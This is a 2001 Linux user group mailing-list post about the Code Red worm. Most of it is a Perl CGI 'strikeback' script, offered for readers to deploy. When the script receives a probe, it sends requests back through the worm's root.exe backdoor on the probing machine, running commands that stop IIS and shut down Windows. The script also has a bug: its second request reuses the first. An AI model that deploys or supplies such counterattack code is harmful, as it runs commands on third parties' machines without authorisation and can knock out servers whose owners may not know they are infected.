[lug] Code Red...
Samartha Deva
blug-receive at mtbwr.net
Sat Aug 11 12:42:48 MDT 2001
There was a slashdot article with a link to:
http://www.dasbistro.com/default.ida
they had this script below and it seems to work - the telnet on port 80
still connects but there is no IIS response when I try accessing it
afterwards with a GET.
If that would shut the stupid NNNN's and XXXX-es off, that would be too
good to be true!
Oh, Btw, I got a call from Qwest today asking if I had any problems with
Code Red. Seems they are getting concerned.
Anyway, the result codes on my 5 IP's on certain httpd requests are no
longer 404, but 200 with a transfer length of 60 ;-)
#!/usr/bin/perl -w
# default.ida in perl
# Copyright 2001 Sam Phillips <sam at dasbistro.com>
# ideas borrowed from Erin Quinlan <erin at dasbistro.com>
# ideas provided by various Internet folk, and all those darn
# Crackmonkeys (http://www.crackmonkey.org) and Pigdoggers
# (http://www.pigdog.org)
#
# Things that this should do...
# * Send email to the machine owner
# * Not act as an attack amplifier - someone could theoretically use this
# to launch a DOS attack of sorts.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
use LWP::UserAgent;
$|++;
print "Content-Type: text/html\n\n";
if (length ($ENV{QUERY_STRING}) > 0) {
my $ua = new LWP::UserAgent;
$ua->agent ("Code Red Strikeback");
$ua->timeout (20);
my $iis_stop_req = new HTTP::Request (GET =>
"http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+iisreset+/stop");
print "probulating... <br>";
my $resp = $ua->request ($iis_stop_req);
if ($resp->is_success) {
print "Appears we have shut down IIS...<br>";
my $server_stop_req = new HTTP::Request (GET =>
"http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5");
$resp = $ua->request ($iis_stop_req);
if ($resp->is_success) {
print "Appears that we have also shutdown whatever OS too...<br>";
}
# ok this will do magic email stuff when I get a chance to write it.
} else {
print "<h2>Boy! Are you yankin' my chain?!?</h2>";
}
}
print <<EOF;
<p>
<h1>WELCOME NTK READERS!</h1>
</p> <p>
<H2>If you are reading this page, then you are probably curious... </H2>
</p>
<p>
This page is actually a script that will connect to your machine and
try to shut it down. Since you are seeing this you probably aren't a
Code Red infected box.
</p>
<p>
This will only work if you are infected with the "code red" virus which
isn't really a virus but is a part of the Microsoft Internet
Information Server (IIS).
</p>
<p> If you were a Code Red infected IIS then the command just sent to port
80 was to stop iis and to reboot your machine. If you aren't infected,
then you have nothing to worry about, otherwise.. you should really use
a secure webserver don't you think?.. one that doesn't let people in a
gaping back door to do stuff like this...)
</p>
<p>
This is how you can protect yourself and others, if you run perl, and a
competent web server:
<ol>
<li>Download this <a href="default.txt">script</a>.</li>
<li>Rename it default.ida and place it in the DocumentRoot of your
server</li>
<li>Make sure the .ida extension is handled as a perl CGI
script.</li>
</ol>
If you can't figure out any of the above instructions then find someone
who can.
</p>
<p>
For historical purposes <a href="old_default.txt">here's the old SSI
version</a>.
</p>
EOF
More information about the LUG
mailing list